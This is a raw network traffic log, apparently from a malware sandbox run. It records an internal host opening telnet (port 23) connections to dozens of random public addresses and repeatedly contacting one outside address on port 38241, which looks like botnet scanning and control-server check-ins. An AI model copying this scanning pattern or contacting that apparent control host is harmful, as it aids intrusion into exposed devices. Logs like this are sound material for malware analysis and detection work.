            Nov 28, 2024 09:08:50.761224985 CET2339804205.196.138.243192.168.2.13
            Nov 28, 2024 09:08:50.761223078 CET4795223192.168.2.1387.130.23.229
            Nov 28, 2024 09:08:50.761241913 CET2341208186.161.147.150192.168.2.13
            Nov 28, 2024 09:08:50.761244059 CET5051023192.168.2.1347.40.215.6
            Nov 28, 2024 09:08:50.761245012 CET3775623192.168.2.1329.121.163.152
            Nov 28, 2024 09:08:50.761254072 CET234516875.208.254.221192.168.2.13
            Nov 28, 2024 09:08:50.761254072 CET4327223192.168.2.13140.234.42.27
            Nov 28, 2024 09:08:50.761260986 CET3980423192.168.2.13205.196.138.243
            Nov 28, 2024 09:08:50.761284113 CET4516823192.168.2.1375.208.254.221
            Nov 28, 2024 09:08:50.761286020 CET4120823192.168.2.13186.161.147.150
            Nov 28, 2024 09:08:50.761359930 CET233508059.60.53.31192.168.2.13
            Nov 28, 2024 09:08:50.761403084 CET3508023192.168.2.1359.60.53.31
            Nov 28, 2024 09:08:50.761688948 CET2352644113.244.50.118192.168.2.13
            Nov 28, 2024 09:08:50.761701107 CET2338958221.19.219.132192.168.2.13
            Nov 28, 2024 09:08:50.761718035 CET235964247.172.98.251192.168.2.13
            Nov 28, 2024 09:08:50.761727095 CET5264423192.168.2.13113.244.50.118
            Nov 28, 2024 09:08:50.761729002 CET3895823192.168.2.13221.19.219.132
            Nov 28, 2024 09:08:50.761739969 CET235954458.79.228.72192.168.2.13
            Nov 28, 2024 09:08:50.761748075 CET5964223192.168.2.1347.172.98.251
            Nov 28, 2024 09:08:50.761751890 CET2357292185.40.158.90192.168.2.13
            Nov 28, 2024 09:08:50.761764050 CET235687874.200.54.18192.168.2.13
            Nov 28, 2024 09:08:50.761779070 CET5954423192.168.2.1358.79.228.72
            Nov 28, 2024 09:08:50.761785984 CET5729223192.168.2.13185.40.158.90
            Nov 28, 2024 09:08:50.761804104 CET5687823192.168.2.1374.200.54.18
            Nov 28, 2024 09:08:50.816477060 CET3824142930154.213.187.214192.168.2.13
            Nov 28, 2024 09:08:50.816680908 CET4293038241192.168.2.13154.213.187.214
            Nov 28, 2024 09:08:50.817492962 CET4293038241192.168.2.13154.213.187.214
            Nov 28, 2024 09:08:50.937587976 CET3824142930154.213.187.214192.168.2.13
            Nov 28, 2024 09:08:50.937695980 CET4293038241192.168.2.13154.213.187.214
            Nov 28, 2024 09:08:51.057660103 CET3824142930154.213.187.214192.168.2.13
            Nov 28, 2024 09:08:52.642872095 CET5177423192.168.2.13134.87.171.91
            Nov 28, 2024 09:08:52.643646002 CET3286023192.168.2.13210.160.165.168
            Nov 28, 2024 09:08:52.644349098 CET4718023192.168.2.1378.175.160.96
            Nov 28, 2024 09:08:52.645083904 CET3448823192.168.2.1338.208.163.3
            Nov 28, 2024 09:08:52.645771027 CET3814423192.168.2.1316.244.187.116
            Nov 28, 2024 09:08:52.646476030 CET3547623192.168.2.1393.137.131.197
            Nov 28, 2024 09:08:52.647160053 CET5060623192.168.2.13196.181.232.11
            Nov 28, 2024 09:08:52.647855043 CET5875223192.168.2.13147.14.192.176
            Nov 28, 2024 09:08:52.648545980 CET4407823192.168.2.1359.14.223.207
            Nov 28, 2024 09:08:52.649264097 CET4420423192.168.2.13133.240.41.171
            Nov 28, 2024 09:08:52.650007010 CET4793423192.168.2.1380.124.175.149
            Nov 28, 2024 09:08:52.650752068 CET3599823192.168.2.1386.89.82.154
            Nov 28, 2024 09:08:52.651463032 CET5087623192.168.2.13131.133.238.207
            Nov 28, 2024 09:08:52.652174950 CET4895223192.168.2.13135.111.163.170
            Nov 28, 2024 09:08:52.652882099 CET4906223192.168.2.1378.140.212.156
            Nov 28, 2024 09:08:52.653564930 CET4140223192.168.2.13221.115.145.193
            Nov 28, 2024 09:08:52.654268980 CET5158423192.168.2.13189.218.230.131
            Nov 28, 2024 09:08:52.654946089 CET4076223192.168.2.13190.46.210.116
            Nov 28, 2024 09:08:52.763099909 CET2351774134.87.171.91192.168.2.13
            Nov 28, 2024 09:08:52.763245106 CET5177423192.168.2.13134.87.171.91
            Nov 28, 2024 09:08:52.763678074 CET2332860210.160.165.168192.168.2.13
            Nov 28, 2024 09:08:52.763829947 CET3286023192.168.2.13210.160.165.168
            Nov 28, 2024 09:08:52.764287949 CET234718078.175.160.96192.168.2.13
            Nov 28, 2024 09:08:52.764365911 CET4718023192.168.2.1378.175.160.96
            Nov 28, 2024 09:08:52.765134096 CET233448838.208.163.3192.168.2.13
            Nov 28, 2024 09:08:52.765188932 CET3448823192.168.2.1338.208.163.3
            Nov 28, 2024 09:08:52.765690088 CET233814416.244.187.116192.168.2.13
            Nov 28, 2024 09:08:52.765738010 CET3814423192.168.2.1316.244.187.116
            Nov 28, 2024 09:08:52.766475916 CET233547693.137.131.197192.168.2.13
            Nov 28, 2024 09:08:52.766530991 CET3547623192.168.2.1393.137.131.197
            Nov 28, 2024 09:08:52.767154932 CET2350606196.181.232.11192.168.2.13
            Nov 28, 2024 09:08:52.767206907 CET5060623192.168.2.13196.181.232.11
            Nov 28, 2024 09:08:52.767770052 CET2358752147.14.192.176192.168.2.13
            Nov 28, 2024 09:08:52.767817020 CET5875223192.168.2.13147.14.192.176
            Nov 28, 2024 09:08:52.768508911 CET234407859.14.223.207192.168.2.13
            Nov 28, 2024 09:08:52.768559933 CET4407823192.168.2.1359.14.223.207
            Nov 28, 2024 09:08:52.769259930 CET2344204133.240.41.171192.168.2.13
            Nov 28, 2024 09:08:52.769304991 CET4420423192.168.2.13133.240.41.171
            Nov 28, 2024 09:08:52.769963980 CET234793480.124.175.149192.168.2.13
            Nov 28, 2024 09:08:52.770013094 CET4793423192.168.2.1380.124.175.149
            Nov 28, 2024 09:08:52.770740986 CET233599886.89.82.154192.168.2.13
            Nov 28, 2024 09:08:52.770808935 CET3599823192.168.2.1386.89.82.154
            Nov 28, 2024 09:08:52.771431923 CET2350876131.133.238.207192.168.2.13
            Nov 28, 2024 09:08:52.771478891 CET5087623192.168.2.13131.133.238.207
            Nov 28, 2024 09:08:52.772118092 CET2348952135.111.163.170192.168.2.13
            Nov 28, 2024 09:08:52.772190094 CET4895223192.168.2.13135.111.163.170
            Nov 28, 2024 09:08:52.772862911 CET234906278.140.212.156192.168.2.13
            Nov 28, 2024 09:08:52.772908926 CET4906223192.168.2.1378.140.212.156
            Nov 28, 2024 09:08:52.773498058 CET2341402221.115.145.193192.168.2.13
            Nov 28, 2024 09:08:52.773544073 CET4140223192.168.2.13221.115.145.193
            Nov 28, 2024 09:08:52.774589062 CET2351584189.218.230.131192.168.2.13
            Nov 28, 2024 09:08:52.774633884 CET5158423192.168.2.13189.218.230.131
            Nov 28, 2024 09:08:52.774986982 CET2340762190.46.210.116192.168.2.13
            Nov 28, 2024 09:08:52.775038004 CET4076223192.168.2.13190.46.210.116
            Nov 28, 2024 09:08:53.657367945 CET5135423192.168.2.1362.188.108.92
            Nov 28, 2024 09:08:53.777623892 CET235135462.188.108.92192.168.2.13
            Nov 28, 2024 09:08:53.777761936 CET5135423192.168.2.1362.188.108.92
            Nov 28, 2024 09:08:54.982676029 CET233599886.89.82.154192.168.2.13
            Nov 28, 2024 09:08:54.982894897 CET3599823192.168.2.1386.89.82.154
            Nov 28, 2024 09:08:54.983555079 CET4968823192.168.2.1393.184.160.255
            Nov 28, 2024 09:08:54.984505892 CET5123423192.168.2.13206.108.173.135
            Nov 28, 2024 09:08:54.984954119 CET6063823192.168.2.1381.142.213.202
            Nov 28, 2024 09:08:55.103363991 CET233599886.89.82.154192.168.2.13
            Nov 28, 2024 09:08:55.103590965 CET234968893.184.160.255192.168.2.13
            Nov 28, 2024 09:08:55.103668928 CET4968823192.168.2.1393.184.160.255
            Nov 28, 2024 09:08:55.104382038 CET2351234206.108.173.135192.168.2.13
            Nov 28, 2024 09:08:55.104476929 CET5123423192.168.2.13206.108.173.135
            Nov 28, 2024 09:08:55.104985952 CET236063881.142.213.202192.168.2.13
            Nov 28, 2024 09:08:55.105030060 CET6063823192.168.2.1381.142.213.202
            Nov 28, 2024 09:08:55.986485958 CET4155823192.168.2.1376.230.101.114
            Nov 28, 2024 09:08:56.106664896 CET234155876.230.101.114192.168.2.13
            Nov 28, 2024 09:08:56.106903076 CET4155823192.168.2.1376.230.101.114
            Nov 28, 2024 09:09:01.941579103 CET3824142930154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:01.941714048 CET4293038241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:02.062017918 CET3824142930154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:03.192715883 CET4297438241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:03.312640905 CET3824142974154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:03.312829018 CET4297438241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:03.313637972 CET4297438241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:03.433556080 CET3824142974154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:03.433641911 CET4297438241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:03.553540945 CET3824142974154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:04.996526957 CET5177423192.168.2.13134.87.171.91
            Nov 28, 2024 09:09:04.996576071 CET3286023192.168.2.13210.160.165.168
            Nov 28, 2024 09:09:04.996582031 CET4718023192.168.2.1378.175.160.96
            Nov 28, 2024 09:09:04.996594906 CET3448823192.168.2.1338.208.163.3
            Nov 28, 2024 09:09:04.996608019 CET3814423192.168.2.1316.244.187.116
            Nov 28, 2024 09:09:04.996608019 CET3547623192.168.2.1393.137.131.197
            Nov 28, 2024 09:09:04.996613026 CET5060623192.168.2.13196.181.232.11
            Nov 28, 2024 09:09:04.996630907 CET5875223192.168.2.13147.14.192.176
            Nov 28, 2024 09:09:04.996632099 CET4420423192.168.2.13133.240.41.171
            Nov 28, 2024 09:09:04.996633053 CET4407823192.168.2.1359.14.223.207
            Nov 28, 2024 09:09:04.996640921 CET4793423192.168.2.1380.124.175.149
            Nov 28, 2024 09:09:04.996645927 CET5087623192.168.2.13131.133.238.207
            Nov 28, 2024 09:09:04.996646881 CET4895223192.168.2.13135.111.163.170
            Nov 28, 2024 09:09:04.996669054 CET4906223192.168.2.1378.140.212.156
            Nov 28, 2024 09:09:04.996669054 CET4140223192.168.2.13221.115.145.193
            Nov 28, 2024 09:09:04.996682882 CET5158423192.168.2.13189.218.230.131
            Nov 28, 2024 09:09:04.996685028 CET4076223192.168.2.13190.46.210.116
            Nov 28, 2024 09:09:05.118396044 CET2351774134.87.171.91192.168.2.13
            Nov 28, 2024 09:09:05.118412971 CET234718078.175.160.96192.168.2.13
            Nov 28, 2024 09:09:05.118423939 CET2332860210.160.165.168192.168.2.13
            Nov 28, 2024 09:09:05.118438005 CET233814416.244.187.116192.168.2.13
            Nov 28, 2024 09:09:05.118472099 CET233448838.208.163.3192.168.2.13
            Nov 28, 2024 09:09:05.118482113 CET2350606196.181.232.11192.168.2.13
            Nov 28, 2024 09:09:05.118493080 CET233547693.137.131.197192.168.2.13
            Nov 28, 2024 09:09:05.118500948 CET2358752147.14.192.176192.168.2.13
            Nov 28, 2024 09:09:05.118510962 CET234407859.14.223.207192.168.2.13
            Nov 28, 2024 09:09:05.118510008 CET5177423192.168.2.13134.87.171.91
            Nov 28, 2024 09:09:05.118519068 CET3286023192.168.2.13210.160.165.168
            Nov 28, 2024 09:09:05.118535042 CET234793480.124.175.149192.168.2.13
            Nov 28, 2024 09:09:05.118546009 CET2344204133.240.41.171192.168.2.13
            Nov 28, 2024 09:09:05.118546009 CET4718023192.168.2.1378.175.160.96
            Nov 28, 2024 09:09:05.118546963 CET3814423192.168.2.1316.244.187.116
            Nov 28, 2024 09:09:05.118549109 CET5060623192.168.2.13196.181.232.11
            Nov 28, 2024 09:09:05.118556023 CET2348952135.111.163.170192.168.2.13
            Nov 28, 2024 09:09:05.118561983 CET3448823192.168.2.1338.208.163.3
            Nov 28, 2024 09:09:05.118575096 CET4793423192.168.2.1380.124.175.149
            Nov 28, 2024 09:09:05.118576050 CET3547623192.168.2.1393.137.131.197
            Nov 28, 2024 09:09:05.118588924 CET4895223192.168.2.13135.111.163.170
            Nov 28, 2024 09:09:05.118588924 CET5875223192.168.2.13147.14.192.176
            Nov 28, 2024 09:09:05.118599892 CET4407823192.168.2.1359.14.223.207
            Nov 28, 2024 09:09:05.118599892 CET4420423192.168.2.13133.240.41.171
            Nov 28, 2024 09:09:05.118643045 CET2350876131.133.238.207192.168.2.13
            Nov 28, 2024 09:09:05.118653059 CET234906278.140.212.156192.168.2.13
            Nov 28, 2024 09:09:05.118662119 CET2341402221.115.145.193192.168.2.13
            Nov 28, 2024 09:09:05.118674040 CET2351584189.218.230.131192.168.2.13
            Nov 28, 2024 09:09:05.118685961 CET5087623192.168.2.13131.133.238.207
            Nov 28, 2024 09:09:05.118695021 CET4906223192.168.2.1378.140.212.156
            Nov 28, 2024 09:09:05.118695021 CET4140223192.168.2.13221.115.145.193
            Nov 28, 2024 09:09:05.118700981 CET5158423192.168.2.13189.218.230.131
            Nov 28, 2024 09:09:05.119592905 CET2340762190.46.210.116192.168.2.13
            Nov 28, 2024 09:09:05.119632006 CET4076223192.168.2.13190.46.210.116
            Nov 28, 2024 09:09:06.999759912 CET3836623192.168.2.13165.179.98.44
            Nov 28, 2024 09:09:07.000580072 CET3818023192.168.2.13163.74.158.201
            Nov 28, 2024 09:09:07.001220942 CET3642823192.168.2.1393.204.127.101
            Nov 28, 2024 09:09:07.001835108 CET4091423192.168.2.13143.219.135.58
            Nov 28, 2024 09:09:07.002557993 CET3883623192.168.2.13188.175.31.135
            Nov 28, 2024 09:09:07.003218889 CET5348423192.168.2.13173.254.183.28
            Nov 28, 2024 09:09:07.003890991 CET3604823192.168.2.1354.126.138.72
            Nov 28, 2024 09:09:07.004551888 CET4878623192.168.2.13130.49.59.239
            Nov 28, 2024 09:09:07.005250931 CET5245423192.168.2.1348.168.194.48
            Nov 28, 2024 09:09:07.005914927 CET5051823192.168.2.13159.29.244.88
            Nov 28, 2024 09:09:07.006565094 CET3920623192.168.2.13128.21.173.252
            Nov 28, 2024 09:09:07.007335901 CET4110423192.168.2.13189.139.64.173
            Nov 28, 2024 09:09:07.007941961 CET3726623192.168.2.13142.6.206.122
            Nov 28, 2024 09:09:07.008586884 CET5664223192.168.2.1394.7.162.114
            Nov 28, 2024 09:09:07.009203911 CET5750623192.168.2.13129.138.171.216
            Nov 28, 2024 09:09:07.010013103 CET5834023192.168.2.13121.52.15.203
            Nov 28, 2024 09:09:07.010689020 CET3948423192.168.2.13184.87.212.149
            Nov 28, 2024 09:09:07.011058092 CET4968823192.168.2.1393.184.160.255
            Nov 28, 2024 09:09:07.011066914 CET4155823192.168.2.1376.230.101.114
            Nov 28, 2024 09:09:07.011101961 CET5123423192.168.2.13206.108.173.135
            Nov 28, 2024 09:09:07.119913101 CET2338366165.179.98.44192.168.2.13
            Nov 28, 2024 09:09:07.120285034 CET3836623192.168.2.13165.179.98.44
            Nov 28, 2024 09:09:07.120512009 CET2338180163.74.158.201192.168.2.13
            Nov 28, 2024 09:09:07.120608091 CET3818023192.168.2.13163.74.158.201
            Nov 28, 2024 09:09:07.121134996 CET233642893.204.127.101192.168.2.13
            Nov 28, 2024 09:09:07.121192932 CET3642823192.168.2.1393.204.127.101
            Nov 28, 2024 09:09:07.121745110 CET2340914143.219.135.58192.168.2.13
            Nov 28, 2024 09:09:07.121798992 CET4091423192.168.2.13143.219.135.58
            Nov 28, 2024 09:09:07.122405052 CET2338836188.175.31.135192.168.2.13
            Nov 28, 2024 09:09:07.122525930 CET3883623192.168.2.13188.175.31.135
            Nov 28, 2024 09:09:07.123696089 CET2353484173.254.183.28192.168.2.13
            Nov 28, 2024 09:09:07.123740911 CET5348423192.168.2.13173.254.183.28
            Nov 28, 2024 09:09:07.124617100 CET233604854.126.138.72192.168.2.13
            Nov 28, 2024 09:09:07.124716997 CET3604823192.168.2.1354.126.138.72
            Nov 28, 2024 09:09:07.125125885 CET2348786130.49.59.239192.168.2.13
            Nov 28, 2024 09:09:07.125179052 CET4878623192.168.2.13130.49.59.239
            Nov 28, 2024 09:09:07.125766039 CET235245448.168.194.48192.168.2.13
            Nov 28, 2024 09:09:07.125806093 CET5245423192.168.2.1348.168.194.48
            Nov 28, 2024 09:09:07.126694918 CET2350518159.29.244.88192.168.2.13
            Nov 28, 2024 09:09:07.126794100 CET5051823192.168.2.13159.29.244.88
            Nov 28, 2024 09:09:07.127265930 CET2339206128.21.173.252192.168.2.13
            Nov 28, 2024 09:09:07.127316952 CET3920623192.168.2.13128.21.173.252
            Nov 28, 2024 09:09:07.127409935 CET2341104189.139.64.173192.168.2.13
            Nov 28, 2024 09:09:07.127445936 CET4110423192.168.2.13189.139.64.173
            Nov 28, 2024 09:09:07.127803087 CET2337266142.6.206.122192.168.2.13
            Nov 28, 2024 09:09:07.127834082 CET3726623192.168.2.13142.6.206.122
            Nov 28, 2024 09:09:07.128475904 CET235664294.7.162.114192.168.2.13
            Nov 28, 2024 09:09:07.128530979 CET5664223192.168.2.1394.7.162.114
            Nov 28, 2024 09:09:07.129108906 CET2357506129.138.171.216192.168.2.13
            Nov 28, 2024 09:09:07.129165888 CET5750623192.168.2.13129.138.171.216
            Nov 28, 2024 09:09:07.129981041 CET2358340121.52.15.203192.168.2.13
            Nov 28, 2024 09:09:07.130040884 CET5834023192.168.2.13121.52.15.203
            Nov 28, 2024 09:09:07.130573988 CET2339484184.87.212.149192.168.2.13
            Nov 28, 2024 09:09:07.130654097 CET3948423192.168.2.13184.87.212.149
            Nov 28, 2024 09:09:07.131083012 CET234968893.184.160.255192.168.2.13
            Nov 28, 2024 09:09:07.131139040 CET4968823192.168.2.1393.184.160.255
            Nov 28, 2024 09:09:07.131442070 CET234155876.230.101.114192.168.2.13
            Nov 28, 2024 09:09:07.131480932 CET4155823192.168.2.1376.230.101.114
            Nov 28, 2024 09:09:07.131488085 CET2351234206.108.173.135192.168.2.13
            Nov 28, 2024 09:09:07.131553888 CET5123423192.168.2.13206.108.173.135
            Nov 28, 2024 09:09:08.012619019 CET4357623192.168.2.1315.16.170.84
            Nov 28, 2024 09:09:08.013310909 CET4406623192.168.2.13171.64.30.26
            Nov 28, 2024 09:09:08.013953924 CET3956223192.168.2.13163.174.23.187
            Nov 28, 2024 09:09:08.132709026 CET234357615.16.170.84192.168.2.13
            Nov 28, 2024 09:09:08.132875919 CET4357623192.168.2.1315.16.170.84
            Nov 28, 2024 09:09:08.133183956 CET2344066171.64.30.26192.168.2.13
            Nov 28, 2024 09:09:08.133234024 CET4406623192.168.2.13171.64.30.26
            Nov 28, 2024 09:09:08.133862019 CET2339562163.174.23.187192.168.2.13
            Nov 28, 2024 09:09:08.133934021 CET3956223192.168.2.13163.174.23.187
            Nov 28, 2024 09:09:13.320446968 CET4297438241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:13.441189051 CET3824142974154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:13.727466106 CET3824142974154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:13.727613926 CET4297438241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:13.847625971 CET3824142974154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:14.979439020 CET4301638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:15.101109028 CET3824143016154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:15.101241112 CET4301638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:15.102330923 CET4301638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:15.222251892 CET3824143016154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:15.222335100 CET4301638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:09:15.342497110 CET3824143016154.213.187.214192.168.2.13
            Nov 28, 2024 09:09:19.026843071 CET3836623192.168.2.13165.179.98.44
            Nov 28, 2024 09:09:19.026863098 CET5245423192.168.2.1348.168.194.48
            Nov 28, 2024 09:09:19.026878119 CET3818023192.168.2.13163.74.158.201
            Nov 28, 2024 09:09:19.026878119 CET4091423192.168.2.13143.219.135.58
            Nov 28, 2024 09:09:19.026880026 CET3604823192.168.2.1354.126.138.72
            Nov 28, 2024 09:09:19.026880026 CET3883623192.168.2.13188.175.31.135
            Nov 28, 2024 09:09:19.026882887 CET5051823192.168.2.13159.29.244.88
            Nov 28, 2024 09:09:19.026885033 CET3642823192.168.2.1393.204.127.101
            Nov 28, 2024 09:09:19.026885033 CET5348423192.168.2.13173.254.183.28
            Nov 28, 2024 09:09:19.026901960 CET4878623192.168.2.13130.49.59.239
            Nov 28, 2024 09:09:19.026905060 CET3920623192.168.2.13128.21.173.252
            Nov 28, 2024 09:09:19.026905060 CET4357623192.168.2.1315.16.170.84
            Nov 28, 2024 09:09:19.026922941 CET4406623192.168.2.13171.64.30.26
            Nov 28, 2024 09:09:19.026922941 CET5834023192.168.2.13121.52.15.203
            Nov 28, 2024 09:09:19.026925087 CET5750623192.168.2.13129.138.171.216
            Nov 28, 2024 09:09:19.026925087 CET3948423192.168.2.13184.87.212.149
            Nov 28, 2024 09:09:19.026931047 CET4110423192.168.2.13189.139.64.173
            Nov 28, 2024 09:09:19.026931047 CET5664223192.168.2.1394.7.162.114
            Nov 28, 2024 09:09:19.026959896 CET3956223192.168.2.13163.174.23.187
            Nov 28, 2024 09:09:19.027123928 CET3726623192.168.2.13142.6.206.122
            Nov 28, 2024 09:09:19.160259008 CET2337266142.6.206.122192.168.2.13
            Nov 28, 2024 09:09:19.160271883 CET2339562163.174.23.187192.168.2.13
            Nov 28, 2024 09:09:19.160304070 CET2339484184.87.212.149192.168.2.13
            Nov 28, 2024 09:09:19.160348892 CET2357506129.138.171.216192.168.2.13
            Nov 28, 2024 09:09:19.160358906 CET235664294.7.162.114192.168.2.13
            Nov 28, 2024 09:09:19.160393953 CET2341104189.139.64.173192.168.2.13
            Nov 28, 2024 09:09:19.160403967 CET2358340121.52.15.203192.168.2.13
            Nov 28, 2024 09:09:19.160758972 CET2344066171.64.30.26192.168.2.13
            Nov 28, 2024 09:09:19.160768986 CET2353484173.254.183.28192.168.2.13
            Nov 28, 2024 09:09:19.160778046 CET233642893.204.127.101192.168.2.13
            Nov 28, 2024 09:09:19.160787106 CET234357615.16.170.84192.168.2.13
            Nov 28, 2024 09:09:19.160795927 CET2339206128.21.173.252192.168.2.13
            Nov 28, 2024 09:09:19.160805941 CET2338836188.175.31.135192.168.2.13
            Nov 28, 2024 09:09:19.160815954 CET2350518159.29.244.88192.168.2.13
            Nov 28, 2024 09:09:19.160824060 CET2348786130.49.59.239192.168.2.13
            Nov 28, 2024 09:09:19.160832882 CET2340914143.219.135.58192.168.2.13
            Nov 28, 2024 09:09:19.160842896 CET233604854.126.138.72192.168.2.13
            Nov 28, 2024 09:09:19.160851955 CET2338180163.74.158.201192.168.2.13
            Nov 28, 2024 09:09:19.160860062 CET235245448.168.194.48192.168.2.13
            Nov 28, 2024 09:09:19.160870075 CET2338366165.179.98.44192.168.2.13
            Nov 28, 2024 09:09:19.160881996 CET2338366165.179.98.44192.168.2.13
            Nov 28, 2024 09:09:19.160891056 CET235245448.168.194.48192.168.2.13
            Nov 28, 2024 09:09:19.160897970 CET2338180163.74.158.201192.168.2.13
            Nov 28, 2024 09:09:19.160907030 CET233604854.126.138.72192.168.2.13
            Nov 28, 2024 09:09:19.160911083 CET2340914143.219.135.58192.168.2.13
            Nov 28, 2024 09:09:19.160921097 CET2348786130.49.59.239192.168.2.13
            Nov 28, 2024 09:09:19.160929918 CET2350518159.29.244.88192.168.2.13
            Nov 28, 2024 09:09:19.160940886 CET2338836188.175.31.135192.168.2.13
            Nov 28, 2024 09:09:19.160958052 CET2339206128.21.173.252192.168.2.13
            Nov 28, 2024 09:09:19.160967112 CET234357615.16.170.84192.168.2.13
            Nov 28, 2024 09:09:19.160974979 CET233642893.204.127.101192.168.2.13
            Nov 28, 2024 09:09:19.160979033 CET2353484173.254.183.28192.168.2.13
            Nov 28, 2024 09:09:19.160981894 CET2344066171.64.30.26192.168.2.13
            Nov 28, 2024 09:09:19.160984993 CET2358340121.52.15.203192.168.2.13
            Nov 28, 2024 09:09:19.160995960 CET2341104189.139.64.173192.168.2.13
            Nov 28, 2024 09:09:19.161005974 CET235664294.7.162.114192.168.2.13
            Nov 28, 2024 09:09:19.161015987 CET2357506129.138.171.216192.168.2.13
            Nov 28, 2024 09:09:19.161025047 CET2339484184.87.212.149192.168.2.13
            Nov 28, 2024 09:09:19.161035061 CET2339562163.174.23.187192.168.2.13
            Nov 28, 2024 09:09:19.161046028 CET2337266142.6.206.122192.168.2.13
            Nov 28, 2024 09:09:19.161079884 CET5051823192.168.2.13159.29.244.88
            Nov 28, 2024 09:09:19.161087990 CET5750623192.168.2.13129.138.171.216
            Nov 28, 2024 09:09:19.161124945 CET3836623192.168.2.13165.179.98.44
            Nov 28, 2024 09:09:19.161128044 CET4091423192.168.2.13143.219.135.58
            Nov 28, 2024 09:09:19.161124945 CET4878623192.168.2.13130.49.59.239
            Nov 28, 2024 09:09:19.161128044 CET3818023192.168.2.13163.74.158.201
            Nov 28, 2024 09:09:19.161128998 CET4406623192.168.2.13171.64.30.26
            Nov 28, 2024 09:09:19.161128998 CET5834023192.168.2.13121.52.15.203
            Nov 28, 2024 09:09:19.161129951 CET5245423192.168.2.1348.168.194.48
            Nov 28, 2024 09:09:19.161129951 CET3920623192.168.2.13128.21.173.252
            Nov 28, 2024 09:09:19.161129951 CET4357623192.168.2.1315.16.170.84
            Nov 28, 2024 09:09:19.161134005 CET3642823192.168.2.1393.204.127.101
            Nov 28, 2024 09:09:19.161134005 CET5348423192.168.2.13173.254.183.28
            Nov 28, 2024 09:09:19.161134005 CET4110423192.168.2.13189.139.64.173
            Nov 28, 2024 09:09:19.161137104 CET3883623192.168.2.13188.175.31.135
            Nov 28, 2024 09:09:19.161134005 CET5664223192.168.2.1394.7.162.114
            Nov 28, 2024 09:09:19.161137104 CET3604823192.168.2.1354.126.138.72
            Nov 28, 2024 09:09:19.161160946 CET3726623192.168.2.13142.6.206.122
            Nov 28, 2024 09:09:19.161166906 CET3948423192.168.2.13184.87.212.149
            Nov 28, 2024 09:09:19.161206007 CET3956223192.168.2.13163.174.23.187
            Nov 28, 2024 09:09:21.029747963 CET5906823192.168.2.1381.223.179.62
            Nov 28, 2024 09:09:21.030515909 CET4510223192.168.2.13138.11.29.60
            Nov 28, 2024 09:09:21.031300068 CET4358223192.168.2.13134.21.140.48
            Nov 28, 2024 09:09:21.032058954 CET4035423192.168.2.13221.167.50.57
            Nov 28, 2024 09:09:21.032918930 CET3407423192.168.2.1340.41.140.132
            Nov 28, 2024 09:09:21.033734083 CET5695423192.168.2.1376.135.171.121
            Nov 28, 2024 09:09:21.034537077 CET4997023192.168.2.13136.93.154.175
            Nov 28, 2024 09:09:21.035368919 CET4031823192.168.2.1312.6.30.250
            Nov 28, 2024 09:09:21.036190987 CET3468423192.168.2.1371.55.229.131
            Nov 28, 2024 09:09:21.037022114 CET4473223192.168.2.13213.20.21.175
            Nov 28, 2024 09:09:21.037867069 CET4656623192.168.2.1352.139.101.13
            Nov 28, 2024 09:09:21.038723946 CET4516623192.168.2.13151.128.126.144
            Nov 28, 2024 09:09:21.039555073 CET5721423192.168.2.1313.39.254.101
            Nov 28, 2024 09:09:21.040431976 CET4264823192.168.2.1397.8.50.18
            Nov 28, 2024 09:09:21.041274071 CET4658623192.168.2.13128.57.243.51
            Nov 28, 2024 09:09:21.042117119 CET5442023192.168.2.1384.105.45.154
            Nov 28, 2024 09:09:21.042973042 CET3676223192.168.2.13110.154.2.238
            Nov 28, 2024 09:09:21.043807983 CET3305023192.168.2.1330.94.236.121
            Nov 28, 2024 09:09:21.044692993 CET4743623192.168.2.1316.60.193.28
            Nov 28, 2024 09:09:21.045521021 CET4494423192.168.2.1398.45.62.139
            Nov 28, 2024 09:09:21.149703979 CET235906881.223.179.62192.168.2.13
            Nov 28, 2024 09:09:21.149900913 CET5906823192.168.2.1381.223.179.62
            Nov 28, 2024 09:09:21.150388002 CET2345102138.11.29.60192.168.2.13
            Nov 28, 2024 09:09:21.150432110 CET4510223192.168.2.13138.11.29.60
            Nov 28, 2024 09:09:21.151156902 CET2343582134.21.140.48192.168.2.13
            Nov 28, 2024 09:09:21.151336908 CET4358223192.168.2.13134.21.140.48
            Nov 28, 2024 09:09:21.151930094 CET2340354221.167.50.57192.168.2.13
            Nov 28, 2024 09:09:21.151984930 CET4035423192.168.2.13221.167.50.57
            Nov 28, 2024 09:09:21.152745962 CET233407440.41.140.132192.168.2.13
            Nov 28, 2024 09:09:21.152801991 CET3407423192.168.2.1340.41.140.132
            Nov 28, 2024 09:09:21.153656006 CET235695476.135.171.121192.168.2.13
            Nov 28, 2024 09:09:21.153707027 CET5695423192.168.2.1376.135.171.121
            Nov 28, 2024 09:09:21.154453039 CET2349970136.93.154.175192.168.2.13
            Nov 28, 2024 09:09:21.154493093 CET4997023192.168.2.13136.93.154.175
            Nov 28, 2024 09:09:21.155234098 CET234031812.6.30.250192.168.2.13
            Nov 28, 2024 09:09:21.155277967 CET4031823192.168.2.1312.6.30.250
            Nov 28, 2024 09:09:21.156074047 CET233468471.55.229.131192.168.2.13
            Nov 28, 2024 09:09:21.156117916 CET3468423192.168.2.1371.55.229.131
            Nov 28, 2024 09:09:21.156864882 CET2344732213.20.21.175192.168.2.13
            Nov 28, 2024 09:09:21.156910896 CET4473223192.168.2.13213.20.21.175
            Nov 28, 2024 09:09:21.157716036 CET234656652.139.101.13192.168.2.13
            Nov 28, 2024 09:09:21.157773972 CET4656623192.168.2.1352.139.101.13
